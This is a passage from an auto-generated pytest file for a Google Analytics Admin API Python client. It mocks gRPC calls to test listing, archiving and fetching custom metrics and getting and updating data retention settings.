transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: client.list_custom_metrics() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListCustomMetricsRequest() @pytest.mark.asyncio async def test_list_custom_metrics_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListCustomMetricsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListCustomMetricsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_custom_metrics(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListCustomMetricsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListCustomMetricsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_custom_metrics_async_from_dict(): await test_list_custom_metrics_async(request_type=dict) def test_list_custom_metrics_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListCustomMetricsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: call.return_value = analytics_admin.ListCustomMetricsResponse() client.list_custom_metrics(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_custom_metrics_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListCustomMetricsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListCustomMetricsResponse() ) await client.list_custom_metrics(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_custom_metrics_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListCustomMetricsResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. 
client.list_custom_metrics(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_custom_metrics_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_custom_metrics( analytics_admin.ListCustomMetricsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_custom_metrics_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListCustomMetricsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListCustomMetricsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_custom_metrics(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_custom_metrics_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.list_custom_metrics( analytics_admin.ListCustomMetricsRequest(), parent="parent_value", ) def test_list_custom_metrics_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListCustomMetricsResponse( custom_metrics=[ resources.CustomMetric(), resources.CustomMetric(), resources.CustomMetric(), ], next_page_token="abc", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[], next_page_token="def", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(),], next_page_token="ghi", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(), resources.CustomMetric(),], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_custom_metrics(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.CustomMetric) for i in results) def test_list_custom_metrics_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListCustomMetricsResponse( custom_metrics=[ resources.CustomMetric(), resources.CustomMetric(), resources.CustomMetric(), ], next_page_token="abc", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[], next_page_token="def", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(),], next_page_token="ghi", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(), resources.CustomMetric(),], ), RuntimeError, ) pages = list(client.list_custom_metrics(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_custom_metrics_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListCustomMetricsResponse( custom_metrics=[ resources.CustomMetric(), resources.CustomMetric(), resources.CustomMetric(), ], next_page_token="abc", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[], next_page_token="def", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(),], next_page_token="ghi", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(), resources.CustomMetric(),], ), RuntimeError, ) async_pager = await client.list_custom_metrics(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.CustomMetric) for i in responses) @pytest.mark.asyncio async def test_list_custom_metrics_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
        call.side_effect = (
            analytics_admin.ListCustomMetricsResponse(
                custom_metrics=[
                    resources.CustomMetric(),
                    resources.CustomMetric(),
                    resources.CustomMetric(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListCustomMetricsResponse(
                custom_metrics=[], next_page_token="def",
            ),
            analytics_admin.ListCustomMetricsResponse(
                custom_metrics=[resources.CustomMetric(),], next_page_token="ghi",
            ),
            analytics_admin.ListCustomMetricsResponse(
                custom_metrics=[resources.CustomMetric(), resources.CustomMetric(),],
            ),
            RuntimeError,
        )
        pages = []
        async for page_ in (await client.list_custom_metrics(request={})).pages:
            pages.append(page_)
        # The final page carries an empty next_page_token.
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token


def test_archive_custom_metric(
    transport: str = "grpc", request_type=analytics_admin.ArchiveCustomMetricRequest
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.archive_custom_metric), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        response = client.archive_custom_metric(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ArchiveCustomMetricRequest()

    # Establish that the response is the type that we expect.
    # ArchiveCustomMetric maps to google.protobuf.Empty, hence None.
    assert response is None


def test_archive_custom_metric_from_dict():
    test_archive_custom_metric(request_type=dict)


def test_archive_custom_metric_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.archive_custom_metric), "__call__"
    ) as call:
        client.archive_custom_metric()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ArchiveCustomMetricRequest()


@pytest.mark.asyncio
async def test_archive_custom_metric_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.ArchiveCustomMetricRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.archive_custom_metric), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        response = await client.archive_custom_metric(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ArchiveCustomMetricRequest()

    # Establish that the response is the type that we expect.
    assert response is None


@pytest.mark.asyncio
async def test_archive_custom_metric_async_from_dict():
    await test_archive_custom_metric_async(request_type=dict)


def test_archive_custom_metric_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.ArchiveCustomMetricRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object( type(client.transport.archive_custom_metric), "__call__" ) as call: call.return_value = None client.archive_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_archive_custom_metric_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ArchiveCustomMetricRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_metric), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.archive_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_archive_custom_metric_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. 
client.archive_custom_metric(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_archive_custom_metric_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.archive_custom_metric( analytics_admin.ArchiveCustomMetricRequest(), name="name_value", ) @pytest.mark.asyncio async def test_archive_custom_metric_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.archive_custom_metric(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_archive_custom_metric_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
    with pytest.raises(ValueError):
        await client.archive_custom_metric(
            analytics_admin.ArchiveCustomMetricRequest(), name="name_value",
        )


def test_get_custom_metric(
    transport: str = "grpc", request_type=analytics_admin.GetCustomMetricRequest
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_custom_metric), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.CustomMetric(
            name="name_value",
            parameter_name="parameter_name_value",
            display_name="display_name_value",
            description="description_value",
            measurement_unit=resources.CustomMetric.MeasurementUnit.STANDARD,
            scope=resources.CustomMetric.MetricScope.EVENT,
        )
        response = client.get_custom_metric(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetCustomMetricRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.CustomMetric)
    assert response.name == "name_value"
    assert response.parameter_name == "parameter_name_value"
    assert response.display_name == "display_name_value"
    assert response.description == "description_value"
    assert response.measurement_unit == resources.CustomMetric.MeasurementUnit.STANDARD
    assert response.scope == resources.CustomMetric.MetricScope.EVENT


def test_get_custom_metric_from_dict():
    test_get_custom_metric(request_type=dict)


def test_get_custom_metric_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_custom_metric), "__call__"
    ) as call:
        client.get_custom_metric()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetCustomMetricRequest()


@pytest.mark.asyncio
async def test_get_custom_metric_async(
    transport: str = "grpc_asyncio", request_type=analytics_admin.GetCustomMetricRequest
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_custom_metric), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.CustomMetric(
                name="name_value",
                parameter_name="parameter_name_value",
                display_name="display_name_value",
                description="description_value",
                measurement_unit=resources.CustomMetric.MeasurementUnit.STANDARD,
                scope=resources.CustomMetric.MetricScope.EVENT,
            )
        )
        response = await client.get_custom_metric(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetCustomMetricRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.CustomMetric)
    assert response.name == "name_value"
    assert response.parameter_name == "parameter_name_value"
    assert response.display_name == "display_name_value"
    assert response.description == "description_value"
    assert response.measurement_unit == resources.CustomMetric.MeasurementUnit.STANDARD
    assert response.scope == resources.CustomMetric.MetricScope.EVENT


@pytest.mark.asyncio
async def test_get_custom_metric_async_from_dict():
    await test_get_custom_metric_async(request_type=dict)


def test_get_custom_metric_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetCustomMetricRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_custom_metric), "__call__"
    ) as call:
        call.return_value = resources.CustomMetric()
        client.get_custom_metric(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_get_custom_metric_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetCustomMetricRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_custom_metric), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.CustomMetric()
        )
        await client.get_custom_metric(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_get_custom_metric_flattened():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_custom_metric), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.CustomMetric()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.get_custom_metric(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


def test_get_custom_metric_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.get_custom_metric(
            analytics_admin.GetCustomMetricRequest(), name="name_value",
        )


@pytest.mark.asyncio
async def test_get_custom_metric_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_custom_metric), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
call.return_value = resources.CustomMetric() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_custom_metric(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_custom_metric_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_custom_metric( analytics_admin.GetCustomMetricRequest(), name="name_value", ) def test_get_data_retention_settings( transport: str = "grpc", request_type=analytics_admin.GetDataRetentionSettingsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataRetentionSettings( name="name_value", event_data_retention=resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS, reset_user_data_on_new_activity=True, ) response = client.get_data_retention_settings(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDataRetentionSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DataRetentionSettings) assert response.name == "name_value" assert ( response.event_data_retention == resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS ) assert response.reset_user_data_on_new_activity is True def test_get_data_retention_settings_from_dict(): test_get_data_retention_settings(request_type=dict) def test_get_data_retention_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_retention_settings), "__call__" ) as call: client.get_data_retention_settings() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDataRetentionSettingsRequest() @pytest.mark.asyncio async def test_get_data_retention_settings_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetDataRetentionSettingsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. 
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.DataRetentionSettings(
                name="name_value",
                event_data_retention=resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS,
                reset_user_data_on_new_activity=True,
            )
        )
        response = await client.get_data_retention_settings(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetDataRetentionSettingsRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.DataRetentionSettings)
    assert response.name == "name_value"
    assert (
        response.event_data_retention
        == resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS
    )
    assert response.reset_user_data_on_new_activity is True


@pytest.mark.asyncio
async def test_get_data_retention_settings_async_from_dict():
    await test_get_data_retention_settings_async(request_type=dict)


def test_get_data_retention_settings_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetDataRetentionSettingsRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_data_retention_settings), "__call__"
    ) as call:
        call.return_value = resources.DataRetentionSettings()
        client.get_data_retention_settings(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_get_data_retention_settings_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetDataRetentionSettingsRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_data_retention_settings), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.DataRetentionSettings()
        )
        await client.get_data_retention_settings(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_get_data_retention_settings_flattened():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_data_retention_settings), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.DataRetentionSettings()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.get_data_retention_settings(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_data_retention_settings_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_data_retention_settings( analytics_admin.GetDataRetentionSettingsRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_data_retention_settings_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataRetentionSettings() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataRetentionSettings() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_data_retention_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_data_retention_settings_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.get_data_retention_settings( analytics_admin.GetDataRetentionSettingsRequest(), name="name_value", ) def test_update_data_retention_settings( transport: str = "grpc", request_type=analytics_admin.UpdateDataRetentionSettingsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataRetentionSettings( name="name_value", event_data_retention=resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS, reset_user_data_on_new_activity=True, ) response = client.update_data_retention_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateDataRetentionSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DataRetentionSettings) assert response.name == "name_value" assert ( response.event_data_retention == resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS ) assert response.reset_user_data_on_new_activity is True def test_update_data_retention_settings_from_dict(): test_update_data_retention_settings(request_type=dict) def test_update_data_retention_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. 
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_data_retention_settings), "__call__"
    ) as call:
        client.update_data_retention_settings()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateDataRetentionSettingsRequest()


@pytest.mark.asyncio
async def test_update_data_retention_settings_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.UpdateDataRetentionSettingsRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_data_retention_settings), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.DataRetentionSettings(
                name="name_value",
                event_data_retention=resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS,
                reset_user_data_on_new_activity=True,
            )
        )
        response = await client.update_data_retention_settings(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateDataRetentionSettingsRequest()

